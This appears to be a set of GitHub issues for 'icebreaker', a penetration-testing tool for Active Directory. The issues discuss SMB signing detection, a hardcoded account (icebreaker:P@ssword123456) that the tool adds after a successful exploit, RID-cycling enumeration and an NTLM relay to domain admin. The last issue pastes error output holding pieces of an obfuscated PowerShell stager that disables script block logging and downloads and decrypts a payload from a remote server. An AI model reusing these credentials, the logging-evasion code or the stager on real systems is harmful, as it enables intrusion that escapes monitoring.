smb-security-mode fails for Windows 10.

The script identified SMB signed hosts using smb-signing-mode. This script will not work for identifying Windows 10. You will need to update the script to include "smb2-security-mode".

Allow user to specify added username/password

Just an enhancement/extra thing to work on for the future. It would be nice to be able to specify the added username and password if exploitation is successful. It will be useful in larger scope engagements where 'icebreaker' will not be quite as stealthy and the password can follow domain password complexity requirements.

Also reduce the possibility that third parties can potentially access internet facing devices that have had the icebreaker account added with the hardcoded credentials.

*Edit for grammar

login after successful attack

hey there
It tells me it automatically created an account "icebreaker:P@ssword123456"
but I somehow can't login via psexec:
[*] 10.20.23.1:445 - Authenticating to 10.20.23.1:445 as user 'icebreaker'...
[*] 10.20.23.1:445 - Uploading payload...
[-] 10.20.23.1:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

it's the AD in my test environment.

nmap XML input is broken

The function run_nse_scripts declares a positional argument hosts then immediately overwrites it with hosts = [], throwing an index error. If this is fixed, another issue arises: TypeError: sequence item 0: expected str instance, NmapHost found stemming from line 133 (report = NmapScan(hosts)) in icebreaker.py, I assume this is because the list of hosts passed to the function on line 1457 contains a list of NmapHost objects, not a list of IPs in str format.

Migrate off of rpcclient dependancy for RID cycling attack

Per the research by SensePost here:

https://sensepost.com/blog/2018/a-new-look-at-null-sessions-and-user-enumeration/

"I found that when I used rpcclient against known vulnerable systems, that it would often produce error messages and fail to enumerate user information. In a penetration test scenario, this behaviour could make one believe that the remote system does not allow one to access the IPC$ share and execute RPC calls, while it could be possible."

"By default, rpcclient first opens the LSARPC pipe and then requests the remote system to execute the LsaOpenPolicy and LsaQueryInformationPolicy functions. If an anonymous user is not allowed to execute these function, rpcclient exits. Most RPC calls however don’t require the information provided by these functions. In our test for example, the smb-enum-users script could still execute QueryDisplayInfo, and enumerate user information, without access to these functions."

It seems that relying on rpcclient could produce a false negative.

ntlmrelayx.py shows 'SMB SessionError' and throws unhandled exception

I am trying to use ntlm relaying to get domain admin in my virtual environment. However, ntlmrelayx.py first shows 'SMB SessionError' and then throws an un-handled exception.

[*] Authenticating against smb://192.168.106.131 as SAFEDOMAIN\Administrator SUCCEED
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
Method invocation failed because 
[System.Collections.Generic.Dictionary`2[[System.String, mscorlib, 
Version=4.0.0.0, Culture=neutral, 
PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=b77a5c561934e089]]] does not contain a method 
named 'nEW'.
At line:1 char:374
+ ... ionLogging']=0}$Val=[CollectIOnS.GEneRIc.DICTioNary[sTRINg,SySTeM.OBjEct]
]::nEW( ...
+                    
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound

You cannot call a method on a null-valued expression.
At line:1 char:441
+ ... BjEct]]::nEW();$val.ADd('EnableScriptB'+'lockLogging',0);$vAL.ADd('Enable
ScriptB ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:483
+ ... ockLogging',0);$vAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKE
Y_LOCAL ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

 Exception calling "DownloadData" with "1" argument(s): "Unable to connect to 
 the remote server"
 At line:1 char:1657
 + ... uVhm0oeKRKg=");$daTa=$WC.DoWNLoADDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAt
a[4..$D ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException

Cannot index into a null array.
At line:1 char:1689
+ ... 
DDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R 
$ ...
+                    ~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:1 char:1705
+ ... IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R $DAta 
($IV+$K))|I ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

~ : The term '~' is not recognized as the name of a cmdlet, function, script 
file, or operable program. Check the spelling of the name, or if a path was 
included, verify that the path is correct and try again.
At line:1 char:1
+ ~
+ ~
+ CategoryInfo          : ObjectNotFound: (~:String) [], CommandNotFoundEx 
 ception
+ FullyQualifiedErrorId : CommandNotFoundException
